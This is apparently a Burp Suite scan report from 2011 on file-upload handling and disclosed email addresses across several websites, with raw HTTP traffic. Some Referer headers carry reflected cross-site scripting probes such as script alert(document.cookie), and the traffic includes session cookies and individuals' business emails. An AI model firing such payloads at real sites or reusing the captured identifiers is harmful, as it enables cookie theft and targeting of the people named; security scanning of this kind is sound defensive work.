Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://malsup.com/jquery/form/files.php

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15. Email addresses disclosed previous next
There are 56 instances of this issue:

http://govguru.com/common/res/js/s_code.js
http://hire.jobvite.com/CompanyJobs/careers_8.js
http://jqueryui.com/about
http://www.ask.com/about/legal/terms
http://www.ask.com/advertise
http://www.reel-time.com/forum/showthread.php
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States
http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States
http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States
http://www.yachtworld.com/boats/category/type/builder/model/United+States
http://www.yachtworld.com/boats/category/type/builder/model/United+States/
http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1
http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1
http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en
http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en
http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en
http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en
http://www.yachtworld.com/core/globalnav/privacy.jsp
http://www.yachtworld.com/core/globalnav/termOfUse.jsp
http://www.yachtworld.com/core/gzip_1874314158/bundles/ywTemplate1Bundle.js
http://www.yachtworld.com/core/listing/cache/searchResults.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp
http://www.yachtworld.com/core/rendering/email-boat.htm
http://www.yachtworld.com/core/rendering/print-boat.htm
http://www.yachtworld.com/core/rendering/print-boat.htm
https://www.yachtworld.com/core/globalnav/privacy.jsp
https://www.yachtworld.com/core/globalnav/termOfUse.jsp
https://www.yachtworld.com/core/listing/cache/searchResults.jsp

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

15.1. http://govguru.com/common/res/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://govguru.com
Path:	/common/res/js/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

GET /common/res/js/s_code.js HTTP/1.1
Host: govguru.com
Proxy-Connection: keep-alive
Referer: http://govguru.com/north-carolina/boat-registration?89d43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee70e52d1510=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=9r2r7aqn70j46rbc3dsh950qp0; loc-1=%2Fnorth-carolina; siteHost=http://govguru.com

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:45:34 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 21:48:44 GMT
ETag: "4dd176-574b-499ad2a3ee700"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=18000
Expires: Fri, 28 Jan 2011 00:45:34 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 22347

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here */

// s_account variabl
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/careers_8.js

Issue detail

The following email addresses were disclosed in the response:

yourname@company.com
yourname@gmail.com
yourname@hotmail.com
yourname@yahoo.com

Request

GET /CompanyJobs/careers_8.js?v=109 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh&7246e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0b363216a36=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=zxau3weru4fb3lbe4ovfsb45; guestidc=980a8eed-7abb-4f24-9da1-d6ed58abf508

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 18 Dec 2010 03:21:22 GMT
Accept-Ranges: bytes
ETag: "025dba4629ecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 27 Jan 2011 19:19:24 GMT
Content-Length: 64810

...var OverlayDialogDefaultWidth = 470;
var jvrecipientindex = 1;
var jvbaseurl = 'http://www.jobvite.com/'
var jvurlargs = '';
var jvurlargsclean = '';
var OverlayDialogInstance = null;
var Ove
...[SNIP]...
</div>');
       _contactImportError = null;
   }
   var i = '';
   switch (_contactImportSource)
   {
       case 'LinkedIn':
           i += 'yourname@company.com';
           break;
       case 'Yahoo':
           i += 'yourname@yahoo.com';
           break;
       case 'Gmail':
           i += 'yourname@gmail.com';
           break;
       case 'Hotmail':
           i += 'yourname@hotmail.com';
           break;
       default:
           i = '';
           break;
   }
   d.addRow('<div">
...[SNIP]...

15.3. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

15.4. http://www.ask.com/about/legal/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The following email address was disclosed in the response:

jobs@ask.com

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

15.5. http://www.ask.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The following email address was disclosed in the response:

busdevpartnerships@ask.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
">
function submitAdvertise(id){
if(id=='sponsor'){
location.href="http://www.ask.com/products/display";
}else if(id=='display'){
location.href="mailto:busdevpartnerships@ask.com";
}
}
</script>
...[SNIP]...

15.6. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The following email address was disclosed in the response:

mcahill@namemedia.com

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.7. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The following email address was disclosed in the response:

internetsales@oystercoveboatworks.com

Request

Response

15.8. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The following email addresses were disclosed in the response:

Justin@DenisonYachtSales.com
justinono@aol.com

Request

Response

15.9. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The following email address was disclosed in the response:

dcurtiss@jarrettbay.com

Request

Response

15.10. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The following email address was disclosed in the response:

shawn@donnelly-yachts.com

Request

Response

15.11. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The following email address was disclosed in the response:

joec@comstockyachtsales.com

Request

Response

15.12. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The following email address was disclosed in the response:

eanderson@legendarymarine.com

Request

Response

15.13. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The following email address was disclosed in the response:

info@southpawyachtsales.com

Request

Response

15.14. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The following email address was disclosed in the response:

andy@jerseymarine.net

Request

Response

15.15. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The following email addresses were disclosed in the response:

dcurtiss@jarrettbay.com
rmooney@jarrettbay.com

Request

Response

15.16. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The following email address was disclosed in the response:

cbeale@bluewateryachtsales.com

Request

Response

15.17. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The following email address was disclosed in the response:

joec@comstockyachtsales.com

Request

Response

15.18. http://www.yachtworld.com/boats/category/type/builder/model/United+States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:16 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:06:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>b
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.19. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/ HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 